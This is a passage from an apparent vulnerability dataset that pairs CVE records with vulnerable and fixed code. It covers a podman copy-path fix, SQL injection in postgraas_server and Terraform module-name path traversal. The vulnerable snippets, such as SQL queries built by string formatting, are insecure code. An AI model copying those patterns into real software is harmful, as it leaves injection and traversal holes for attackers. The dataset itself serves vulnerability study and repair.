isFromHostToCtr)\n\t\tif lastError != nil {\n\t\t\tlogrus.Error(lastError)\n\t\t}\n\t\tlastError = err\n\t}\n\treturn 
lastError\n}"}], "vul_patch": "--- a/cmd/podman/cliconfig/create.go\n+++ b/cmd/podman/cliconfig/create.go\n@@ -1,4 +1,5 @@\n type CpValues struct {\n \tPodmanCommand\n \tExtract bool\n+\tPause bool\n }\n\n--- a/cmd/podman/cp.go\n+++ b/cmd/podman/cp.go\n@@ -2,6 +2,7 @@\n \tcpCommand.Command = _cpCommand\n \tflags := cpCommand.Flags()\n \tflags.BoolVar(&cpCommand.Extract, \"extract\", false, \"Extract the tar file into the destination directory.\")\n+\tflags.BoolVar(&cpCommand.Pause, \"pause\", true, \"Pause the container while copying\")\n \tcpCommand.SetHelpTemplate(HelpTemplate())\n \tcpCommand.SetUsageTemplate(UsageTemplate())\n \trootCmd.AddCommand(cpCommand.Command)\n\n--- a/cmd/podman/cp.go\n+++ b/cmd/podman/cp.go\n@@ -10,6 +10,5 @@\n \t}\n \tdefer runtime.Shutdown(false)\n \n-\textract := c.Flag(\"extract\").Changed\n-\treturn copyBetweenHostAndContainer(runtime, args[0], args[1], extract)\n+\treturn copyBetweenHostAndContainer(runtime, args[0], args[1], c.Extract, c.Pause)\n }\n\n--- a/cmd/podman/cp.go\n+++ b/cmd/podman/cp.go\n@@ -1,4 +1,4 @@\n-func copyBetweenHostAndContainer(runtime *libpod.Runtime, src string, dest string, extract bool) error {\n+func copyBetweenHostAndContainer(runtime *libpod.Runtime, src string, dest string, extract bool, pause bool) error {\n \n \tsrcCtr, srcPath := parsePath(runtime, src)\n \tdestCtr, destPath := parsePath(runtime, dest)\n@@ -21,6 +21,38 @@\n \t\treturn err\n \t}\n \tdefer ctr.Unmount(false)\n+\n+\t// We can't pause rootless containers.\n+\tif pause && rootless.IsRootless() {\n+\t\tstate, err := ctr.State()\n+\t\tif err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t\tif state == libpod.ContainerStateRunning {\n+\t\t\treturn errors.Errorf(\"cannot copy into running rootless container with pause set - pass --pause=false to force copying\")\n+\t\t}\n+\t}\n+\n+\tif pause && !rootless.IsRootless() {\n+\t\tif err := ctr.Pause(); err != nil {\n+\t\t\t// An invalid state error is fine.\n+\t\t\t// The container isn't running or is already paused.\n+\t\t\t// TODO: We can potentially start the container while\n+\t\t\t// the copy is running, which still allows a race where\n+\t\t\t// malicious code could mess with the symlink.\n+\t\t\tif errors.Cause(err) != libpod.ErrCtrStateInvalid {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t} else if err == nil {\n+\t\t\t// Only add the defer if we actually paused\n+\t\t\tdefer func() {\n+\t\t\t\tif err := ctr.Unpause(); err != nil {\n+\t\t\t\t\tlogrus.Errorf(\"Error unpausing container after copying: %v\", err)\n+\t\t\t\t}\n+\t\t\t}()\n+\t\t}\n+\t}\n+\n \tuser, err := getUser(mountPoint, ctr.User())\n \tif err != nil {\n \t\treturn err\n@@ -40,19 +72,38 @@\n \tvar glob []string\n \tif isFromHostToCtr {\n \t\tif filepath.IsAbs(destPath) {\n-\t\t\tdestPath = filepath.Join(mountPoint, destPath)\n-\n+\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, destPath)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tdestPath = cleanedPath\n \t\t} else {\n-\t\t\tif err = idtools.MkdirAllAndChownNew(filepath.Join(mountPoint, ctr.WorkingDir()), 0755, hostOwner); err != nil {\n+\t\t\tctrWorkDir, err := securejoin.SecureJoin(mountPoint, ctr.WorkingDir())\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tif err = idtools.MkdirAllAndChownNew(ctrWorkDir, 0755, hostOwner); err != nil {\n \t\t\t\treturn errors.Wrapf(err, \"error creating directory %q\", destPath)\n \t\t\t}\n-\t\t\tdestPath = filepath.Join(mountPoint, ctr.WorkingDir(), destPath)\n+\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, 
filepath.Join(ctr.WorkingDir(), destPath))\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tdestPath = cleanedPath\n \t\t}\n \t} else {\n \t\tif filepath.IsAbs(srcPath) {\n-\t\t\tsrcPath = filepath.Join(mountPoint, srcPath)\n+\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, srcPath)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tsrcPath = cleanedPath\n \t\t} else {\n-\t\t\tsrcPath = filepath.Join(mountPoint, ctr.WorkingDir(), srcPath)\n+\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, filepath.Join(ctr.WorkingDir(), srcPath))\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tsrcPath = cleanedPath\n \t\t}\n \t}\n \tglob, err = filepath.Glob(srcPath)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-25088", "cve_description": "A vulnerability, which was classified as critical, was found in Blue Yonder postgraas_server up to 2.0.0b2. Affected is the function _create_pg_connection/create_postgres_db of the file postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py of the component PostgreSQL Backend Handler. The manipulation leads to sql injection. Upgrading to version 2.0.0 is able to address this issue. The patch is identified as 7cd8d016edc74a78af0d81c948bfafbcc93c937c. It is recommended to upgrade the affected component. VDB-234246 is the identifier assigned to this vulnerability.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/blue-yonder/postgraas_server", "patch_url": ["https://github.com/blue-yonder/postgraas_server/commit/7cd8d016edc74a78af0d81c948bfafbcc93c937c"], "programing_language": "Python", "vul_func": [{"id": "vul_py_232_1", "commit": "bd4f1b8", "file_path": "postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py", "start_line": 19, "end_line": 27, "snippet": "def check_db_or_user_exists(db_name, db_user, config):\n with _create_pg_connection(config) as con:\n with con.cursor() as cur:\n cur.execute(\"SELECT 1 FROM pg_database WHERE datname='{}';\".format(db_name))\n db_exists = cur.fetchone() is not None\n cur.execute(\"SELECT 1 FROM pg_roles WHERE rolname='{}';\".format(db_user))\n user = cur.fetchone()\n user_exists = user is not None\n return db_exists or user_exists"}, {"id": "vul_py_232_2", "commit": "bd4f1b8", "file_path": "postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py", "start_line": 30, "end_line": 53, "snippet": "def create_postgres_db(connection_dict, config):\n if check_db_or_user_exists(connection_dict[\"db_name\"], connection_dict[\"db_username\"], config):\n raise ValueError(\"db or user already exists\")\n with _create_pg_connection(config) as con:\n con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n with con.cursor() as cur:\n create_role = \"CREATE USER {db_username} WITH PASSWORD '{db_pwd}';\".format(**connection_dict)\n drop_role = \"DROP ROLE {db_username};\".format(**connection_dict)\n grant_role = 'GRANT {db_username} TO \"{postgraas_user}\";'.format(\n db_username=connection_dict['db_username'], postgraas_user=get_normalized_username(config['username'])\n )\n create_database = \"CREATE DATABASE {db_name} OWNER {db_username};\".format(**connection_dict)\n try:\n cur.execute(create_role)\n cur.execute(grant_role)\n except psycopg2.ProgrammingError as e:\n raise ValueError(e.args[0])\n # cleanup role in case database creation fails\n # saidly 'CREATE DATABASE' cannot run inside a transaction block\n try:\n cur.execute(create_database)\n except psycopg2.ProgrammingError as e:\n cur.execute(drop_role)\n raise ValueError(e.args[0])"}], "fix_func": [{"id": "fix_py_232_1", "commit": "7cd8d01", "file_path": "postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py", "start_line": 20, "end_line": 28, "snippet": "def check_db_or_user_exists(db_name, db_user, config):\n with _create_pg_connection(config) as con:\n with con.cursor() as cur:\n cur.execute(\"SELECT 1 FROM pg_database WHERE datname=%s;\", (db_name, ))\n db_exists = cur.fetchone() is not None\n cur.execute(\"SELECT 1 FROM pg_roles WHERE rolname=%s;\", (db_user, ))\n user = cur.fetchone()\n user_exists = user is not None\n return db_exists or user_exists"}, {"id": "fix_py_232_2", "commit": "7cd8d01", "file_path": "postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py", "start_line": 31, "end_line": 60, "snippet": "def create_postgres_db(connection_dict, config):\n if check_db_or_user_exists(connection_dict[\"db_name\"], connection_dict[\"db_username\"], config):\n raise ValueError(\"db or user already exists\")\n with _create_pg_connection(config) as con:\n con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n with con.cursor() as cur:\n try:\n cur.execute(SQL(\"CREATE USER {} WITH PASSWORD %s;\").format(\n 
Identifier(connection_dict['db_username']),\n ), (\n connection_dict['db_pwd'],\n ))\n cur.execute(SQL(\"GRANT {} TO {};\").format(\n Identifier(connection_dict['db_username']),\n Identifier(get_normalized_username(config['username'])),\n ))\n except psycopg2.ProgrammingError as e:\n raise ValueError(e.args[0])\n # cleanup role in case database creation fails\n # sadly 'CREATE DATABASE' cannot run inside a transaction block\n try:\n cur.execute(SQL(\"CREATE DATABASE {} OWNER {};\").format(\n Identifier(connection_dict['db_name']),\n Identifier(connection_dict['db_username']),\n ))\n except psycopg2.ProgrammingError as e:\n cur.execute(SQL(\"DROP ROLE {};\").format(\n Identifier(connection_dict['db_username']),\n ))\n raise ValueError(e.args[0])"}], "vul_patch": "--- a/postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py\n+++ b/postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py\n@@ -1,9 +1,9 @@\n def check_db_or_user_exists(db_name, db_user, config):\n with _create_pg_connection(config) as con:\n with con.cursor() as cur:\n- cur.execute(\"SELECT 1 FROM pg_database WHERE datname='{}';\".format(db_name))\n+ cur.execute(\"SELECT 1 FROM pg_database WHERE datname=%s;\", (db_name, ))\n db_exists = cur.fetchone() is not None\n- cur.execute(\"SELECT 1 FROM pg_roles WHERE rolname='{}';\".format(db_user))\n+ cur.execute(\"SELECT 1 FROM pg_roles WHERE rolname=%s;\", (db_user, ))\n user = cur.fetchone()\n user_exists = user is not None\n return db_exists or user_exists\n\n--- a/postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py\n+++ b/postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py\n@@ -4,21 +4,27 @@\n with _create_pg_connection(config) as con:\n con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n with con.cursor() as cur:\n- create_role = \"CREATE USER {db_username} WITH PASSWORD '{db_pwd}';\".format(**connection_dict)\n- drop_role = \"DROP ROLE {db_username};\".format(**connection_dict)\n- grant_role = 'GRANT {db_username} TO \"{postgraas_user}\";'.format(\n- db_username=connection_dict['db_username'], postgraas_user=get_normalized_username(config['username'])\n- )\n- create_database = \"CREATE DATABASE {db_name} OWNER {db_username};\".format(**connection_dict)\n try:\n- cur.execute(create_role)\n- cur.execute(grant_role)\n+ cur.execute(SQL(\"CREATE USER {} WITH PASSWORD %s;\").format(\n+ Identifier(connection_dict['db_username']),\n+ ), (\n+ connection_dict['db_pwd'],\n+ ))\n+ cur.execute(SQL(\"GRANT {} TO {};\").format(\n+ Identifier(connection_dict['db_username']),\n+ Identifier(get_normalized_username(config['username'])),\n+ ))\n except psycopg2.ProgrammingError as e:\n raise ValueError(e.args[0])\n # cleanup role in case database creation fails\n- # saidly 'CREATE DATABASE' cannot run inside a transaction block\n+ # sadly 'CREATE DATABASE' cannot run inside a transaction block\n try:\n- cur.execute(create_database)\n+ cur.execute(SQL(\"CREATE DATABASE {} OWNER {};\").format(\n+ Identifier(connection_dict['db_name']),\n+ Identifier(connection_dict['db_username']),\n+ ))\n except psycopg2.ProgrammingError as e:\n- cur.execute(drop_role)\n+ cur.execute(SQL(\"DROP ROLE {};\").format(\n+ Identifier(connection_dict['db_username']),\n+ ))\n raise ValueError(e.args[0])\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-4782", "cve_description": "Terraform version 1.0.8 through 1.5.6 allows arbitrary file write during the `init` operation if run on maliciously crafted Terraform configuration. 
This vulnerability is fixed in Terraform 1.5.7.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/hashicorp/terraform", "patch_url": ["https://github.com/hashicorp/terraform/commit/0f2314fb62193c4be94328cc026fcb7ec1e9b893"], "programing_language": "Go", "vul_func": [{"id": "vul_go_265_1", "commit": "1c3e25b0fda77460c40387f5ebe10c59893a7d11", "file_path": "internal/initwd/module_install.go", "start_line": 144, "end_line": 284, "snippet": "func (i *ModuleInstaller) moduleInstallWalker(ctx context.Context, manifest modsdir.Manifest, upgrade bool, hooks ModuleInstallHooks, fetcher *getmodules.PackageFetcher) configs.ModuleWalker {\n\treturn configs.ModuleWalkerFunc(\n\t\tfunc(req *configs.ModuleRequest) (*configs.Module, *version.Version, hcl.Diagnostics) {\n\t\t\tvar diags hcl.Diagnostics\n\n\t\t\tif req.SourceAddr == nil {\n\t\t\t\t// If the parent module failed to parse the module source\n\t\t\t\t// address, we can't load it here. Return nothing as the parent\n\t\t\t\t// module's diagnostics should explain this.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tif req.Name == \"\" {\n\t\t\t\t// An empty string for a module instance name breaks our\n\t\t\t\t// manifest map, which uses that to indicate the root module.\n\t\t\t\t// Because we descend into modules which have errors, we need\n\t\t\t\t// to look out for this case, but the config loader's\n\t\t\t\t// diagnostics will report the error later.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tkey := manifest.ModuleKey(req.Path)\n\t\t\tinstPath := i.packageInstallPath(req.Path)\n\n\t\t\tlog.Printf(\"[DEBUG] Module installer: begin %s\", key)\n\n\t\t\t// First we'll check if we need to upgrade/replace an existing\n\t\t\t// installed module, and delete it out of the way if so.\n\t\t\treplace := upgrade\n\t\t\tif !replace {\n\t\t\t\trecord, recorded := manifest[key]\n\t\t\t\tswitch {\n\t\t\t\tcase !recorded:\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s is not yet installed\", key)\n\t\t\t\t\treplace = true\n\t\t\t\tcase record.SourceAddr != req.SourceAddr.String():\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s source address has changed from %q to %q\", key, record.SourceAddr, req.SourceAddr)\n\t\t\t\t\treplace = true\n\t\t\t\tcase record.Version != nil && !req.VersionConstraint.Required.Check(record.Version):\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s version %s no longer compatible with constraints %s\", key, record.Version, req.VersionConstraint.Required)\n\t\t\t\t\treplace = true\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If we _are_ planning to replace this module, then we'll remove\n\t\t\t// it now so our installation code below won't conflict with any\n\t\t\t// existing remnants.\n\t\t\tif replace {\n\t\t\t\tif _, recorded := manifest[key]; recorded {\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: discarding previous record of %s prior to reinstall\", 
key)\n\t\t\t\t}\n\t\t\t\tdelete(manifest, key)\n\t\t\t\t// Deleting a module invalidates all of its descendent modules too.\n\t\t\t\tkeyPrefix := key + \".\"\n\t\t\t\tfor subKey := range manifest {\n\t\t\t\t\tif strings.HasPrefix(subKey, keyPrefix) {\n\t\t\t\t\t\tif _, recorded := manifest[subKey]; recorded {\n\t\t\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: also discarding downstream %s\", subKey)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdelete(manifest, subKey)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\trecord, recorded := manifest[key]\n\t\t\tif !recorded {\n\t\t\t\t// Clean up any stale cache directory that might be present.\n\t\t\t\t// If this is a local (relative) source then the dir will\n\t\t\t\t// not exist, but we'll ignore that.\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: cleaning directory %s prior to install of %s\", instPath, key)\n\t\t\t\terr := os.RemoveAll(instPath)\n\t\t\t\tif err != nil && !os.IsNotExist(err) {\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: failed to remove %s: %s\", key, err)\n\t\t\t\t\tdiags = diags.Append(&hcl.Diagnostic{\n\t\t\t\t\t\tSeverity: hcl.DiagError,\n\t\t\t\t\t\tSummary: \"Failed to remove local module cache\",\n\t\t\t\t\t\tDetail: fmt.Sprintf(\n\t\t\t\t\t\t\t\"Terraform tried to remove %s in order to reinstall this module, but encountered an error: %s\",\n\t\t\t\t\t\t\tinstPath, err,\n\t\t\t\t\t\t),\n\t\t\t\t\t})\n\t\t\t\t\treturn nil, nil, diags\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t// If this module is already recorded and its root directory\n\t\t\t\t// exists then we will just load what's already there and\n\t\t\t\t// keep our existing record.\n\t\t\t\tinfo, err := os.Stat(record.Dir)\n\t\t\t\tif err == nil && info.IsDir() {\n\t\t\t\t\tmod, mDiags := i.loader.Parser().LoadConfigDir(record.Dir)\n\t\t\t\t\tif mod == nil {\n\t\t\t\t\t\t// nil indicates an unreadable module, which should never happen,\n\t\t\t\t\t\t// so we return the full loader diagnostics here.\n\t\t\t\t\t\tdiags = diags.Extend(mDiags)\n\t\t\t\t\t} else if vDiags := mod.CheckCoreVersionRequirements(req.Path, req.SourceAddr); vDiags.HasErrors() {\n\t\t\t\t\t\t// If the core version requirements are not met, we drop any other\n\t\t\t\t\t\t// diagnostics, as they may reflect language changes from future\n\t\t\t\t\t\t// Terraform versions.\n\t\t\t\t\t\tdiags = diags.Extend(vDiags)\n\t\t\t\t\t} else {\n\t\t\t\t\t\tdiags = diags.Extend(mDiags)\n\t\t\t\t\t}\n\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: Module installer: %s %s already installed in %s\", key, record.Version, record.Dir)\n\t\t\t\t\treturn mod, record.Version, diags\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If we get down here then it's finally time to actually install\n\t\t\t// the module. 
There are some variants to this process depending\n\t\t\t// on what type of module source address we have.\n\n\t\t\tswitch addr := req.SourceAddr.(type) {\n\n\t\t\tcase addrs.ModuleSourceLocal:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s has local path %q\", key, addr.String())\n\t\t\t\tmod, mDiags := i.installLocalModule(req, key, manifest, hooks)\n\t\t\t\tmDiags = maybeImproveLocalInstallError(req, mDiags)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, nil, diags\n\n\t\t\tcase addrs.ModuleSourceRegistry:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s is a registry module at %s\", key, addr.String())\n\t\t\t\tmod, v, mDiags := i.installRegistryModule(ctx, req, key, instPath, addr, manifest, hooks, fetcher)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, v, diags\n\n\t\t\tcase addrs.ModuleSourceRemote:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s address %q will be handled by go-getter\", key, addr.String())\n\t\t\t\tmod, mDiags := i.installGoGetterModule(ctx, req, key, instPath, manifest, hooks, fetcher)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, nil, diags\n\n\t\t\tdefault:\n\t\t\t\t// Shouldn't get here, because there are no other implementations\n\t\t\t\t// of addrs.ModuleSource.\n\t\t\t\tpanic(fmt.Sprintf(\"unsupported module source address %#v\", addr))\n\t\t\t}\n\t\t},\n\t)\n}"}], "fix_func": [{"id": "fix_go_265_1", "commit": "0f2314fb62193c4be94328cc026fcb7ec1e9b893", "file_path": "internal/initwd/module_install.go", "start_line": 144, "end_line": 291, "snippet": "func (i *ModuleInstaller) moduleInstallWalker(ctx context.Context, manifest modsdir.Manifest, upgrade bool, hooks ModuleInstallHooks, fetcher *getmodules.PackageFetcher) configs.ModuleWalker {\n\treturn configs.ModuleWalkerFunc(\n\t\tfunc(req *configs.ModuleRequest) (*configs.Module, *version.Version, hcl.Diagnostics) {\n\t\t\tvar diags hcl.Diagnostics\n\n\t\t\tif req.SourceAddr == nil {\n\t\t\t\t// If the parent module failed to parse the module source\n\t\t\t\t// address, we can't load it here. Return nothing as the parent\n\t\t\t\t// module's diagnostics should explain this.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tif req.Name == \"\" {\n\t\t\t\t// An empty string for a module instance name breaks our\n\t\t\t\t// manifest map, which uses that to indicate the root module.\n\t\t\t\t// Because we descend into modules which have errors, we need\n\t\t\t\t// to look out for this case, but the config loader's\n\t\t\t\t// diagnostics will report the error later.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tif !hclsyntax.ValidIdentifier(req.Name) {\n\t\t\t\t// A module with an invalid name shouldn't be installed at all. 
This is\n\t\t\t\t// mostly a concern for remote modules, since we need to be able to convert\n\t\t\t\t// the name to a valid path.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tkey := manifest.ModuleKey(req.Path)\n\t\t\tinstPath := i.packageInstallPath(req.Path)\n\n\t\t\tlog.Printf(\"[DEBUG] Module installer: begin %s\", key)\n\n\t\t\t// First we'll check if we need to upgrade/replace an existing\n\t\t\t// installed module, and delete it out of the way if so.\n\t\t\treplace := upgrade\n\t\t\tif !replace {\n\t\t\t\trecord, recorded := manifest[key]\n\t\t\t\tswitch {\n\t\t\t\tcase !recorded:\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s is not yet installed\", key)\n\t\t\t\t\treplace = true\n\t\t\t\tcase record.SourceAddr != req.SourceAddr.String():\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s source address has changed from %q to %q\", key, record.SourceAddr, req.SourceAddr)\n\t\t\t\t\treplace = true\n\t\t\t\tcase record.Version != nil && !req.VersionConstraint.Required.Check(record.Version):\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s version %s no longer compatible with constraints %s\", key, record.Version, req.VersionConstraint.Required)\n\t\t\t\t\treplace = true\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If we _are_ planning to replace this module, then we'll remove\n\t\t\t// it now so our installation code below won't conflict with any\n\t\t\t// existing remnants.\n\t\t\tif replace {\n\t\t\t\tif _, recorded := manifest[key]; recorded {\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: discarding previous record of %s prior to reinstall\", key)\n\t\t\t\t}\n\t\t\t\tdelete(manifest, key)\n\t\t\t\t// Deleting a module invalidates all of its descendent modules too.\n\t\t\t\tkeyPrefix := key + \".\"\n\t\t\t\tfor subKey := range manifest {\n\t\t\t\t\tif strings.HasPrefix(subKey, keyPrefix) {\n\t\t\t\t\t\tif _, recorded := manifest[subKey]; recorded {\n\t\t\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: also discarding downstream %s\", subKey)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdelete(manifest, subKey)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\trecord, recorded := manifest[key]\n\t\t\tif !recorded {\n\t\t\t\t// Clean up any stale cache directory that might be present.\n\t\t\t\t// If this is a local (relative) source then the dir will\n\t\t\t\t// not exist, but we'll ignore that.\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: cleaning directory %s prior to install of %s\", instPath, key)\n\t\t\t\terr := os.RemoveAll(instPath)\n\t\t\t\tif err != nil && !os.IsNotExist(err) {\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: failed to remove %s: %s\", key, err)\n\t\t\t\t\tdiags = diags.Append(&hcl.Diagnostic{\n\t\t\t\t\t\tSeverity: hcl.DiagError,\n\t\t\t\t\t\tSummary: \"Failed to remove local module cache\",\n\t\t\t\t\t\tDetail: fmt.Sprintf(\n\t\t\t\t\t\t\t\"Terraform tried to remove %s in order to reinstall this module, but encountered an error: %s\",\n\t\t\t\t\t\t\tinstPath, err,\n\t\t\t\t\t\t),\n\t\t\t\t\t})\n\t\t\t\t\treturn nil, nil, diags\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t// If this module is already recorded and its root directory\n\t\t\t\t// exists then we will just load what's already there and\n\t\t\t\t// keep our existing record.\n\t\t\t\tinfo, err := os.Stat(record.Dir)\n\t\t\t\tif err == nil && info.IsDir() {\n\t\t\t\t\tmod, mDiags := i.loader.Parser().LoadConfigDir(record.Dir)\n\t\t\t\t\tif mod == nil {\n\t\t\t\t\t\t// nil indicates an unreadable module, which should never happen,\n\t\t\t\t\t\t// so we return the full loader diagnostics here.\n\t\t\t\t\t\tdiags = 
diags.Extend(mDiags)\n\t\t\t\t\t} else if vDiags := mod.CheckCoreVersionRequirements(req.Path, req.SourceAddr); vDiags.HasErrors() {\n\t\t\t\t\t\t// If the core version requirements are not met, we drop any other\n\t\t\t\t\t\t// diagnostics, as they may reflect language changes from future\n\t\t\t\t\t\t// Terraform versions.\n\t\t\t\t\t\tdiags = diags.Extend(vDiags)\n\t\t\t\t\t} else {\n\t\t\t\t\t\tdiags = diags.Extend(mDiags)\n\t\t\t\t\t}\n\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: Module installer: %s %s already installed in %s\", key, record.Version, record.Dir)\n\t\t\t\t\treturn mod, record.Version, diags\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If we get down here then it's finally time to actually install\n\t\t\t// the module. There are some variants to this process depending\n\t\t\t// on what type of module source address we have.\n\n\t\t\tswitch addr := req.SourceAddr.(type) {\n\n\t\t\tcase addrs.ModuleSourceLocal:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s has local path %q\", key, addr.String())\n\t\t\t\tmod, mDiags := i.installLocalModule(req, key, manifest, hooks)\n\t\t\t\tmDiags = maybeImproveLocalInstallError(req, mDiags)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, nil, diags\n\n\t\t\tcase addrs.ModuleSourceRegistry:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s is a registry module at %s\", key, addr.String())\n\t\t\t\tmod, v, mDiags := i.installRegistryModule(ctx, req, key, instPath, addr, manifest, hooks, fetcher)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, v, diags\n\n\t\t\tcase addrs.ModuleSourceRemote:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s address %q will be handled by go-getter\", key, addr.String())\n\t\t\t\tmod, mDiags := i.installGoGetterModule(ctx, req, key, instPath, manifest, hooks, fetcher)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, nil, diags\n\n\t\t\tdefault:\n\t\t\t\t// Shouldn't get here, because there are no other implementations\n\t\t\t\t// of addrs.ModuleSource.\n\t\t\t\tpanic(fmt.Sprintf(\"unsupported module source address %#v\", addr))\n\t\t\t}\n\t\t},\n\t)\n}"}], "vul_patch": "--- a/internal/initwd/module_install.go\n+++ b/internal/initwd/module_install.go\n@@ -16,6 +16,13 @@\n \t\t\t\t// Because we descend into modules which have errors, we need\n \t\t\t\t// to look out for this case, but the config loader's\n \t\t\t\t// diagnostics will report the error later.\n+\t\t\t\treturn nil, nil, diags\n+\t\t\t}\n+\n+\t\t\tif !hclsyntax.ValidIdentifier(req.Name) {\n+\t\t\t\t// A module with an invalid name shouldn't be installed at all. This is\n+\t\t\t\t// mostly a concern for remote modules, since we need to be able to convert\n+\t\t\t\t// the name to a valid path.\n \t\t\t\treturn nil, nil, diags\n \t\t\t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-19499", "cve_description": "Grafana <= 6.4.3 has an Arbitrary File Read vulnerability, which could be exploited by an authenticated attacker that has privileges to modify the data source configurations.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
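The Terraform record above fixes its CWE-22 issue by refusing to install any module whose name is not a valid HCL identifier, because the name is later turned into a filesystem path (hclsyntax.ValidIdentifier in the patch). Below is a minimal Python sketch of the same guard; the regex only approximates HCL's identifier grammar, and the directory names are illustrative, not Terraform's actual layout.

import os
import re

# Conservative approximation of an HCL identifier; the real
# hclsyntax.ValidIdentifier also accepts certain Unicode classes.
VALID_MODULE_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_-]*$")

def module_install_path(base_dir, module_name):
    """Refuse names that could escape base_dir before building the path."""
    if not VALID_MODULE_NAME.match(module_name):
        raise ValueError(f"invalid module name: {module_name!r}")
    path = os.path.join(base_dir, module_name)
    # Defense in depth: the resolved path must remain under base_dir.
    base = os.path.abspath(base_dir)
    if os.path.commonpath([base, os.path.abspath(path)]) != base:
        raise ValueError("module path escapes the install directory")
    return path

print(module_install_path(".terraform/modules", "vpc"))    # .terraform/modules/vpc
# module_install_path(".terraform/modules", "../../etc")   # raises ValueError

Rejecting the name outright (rather than sanitizing it) matches the patch's design: an invalid name indicates a malformed or hostile module request, so nothing should be installed at all.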
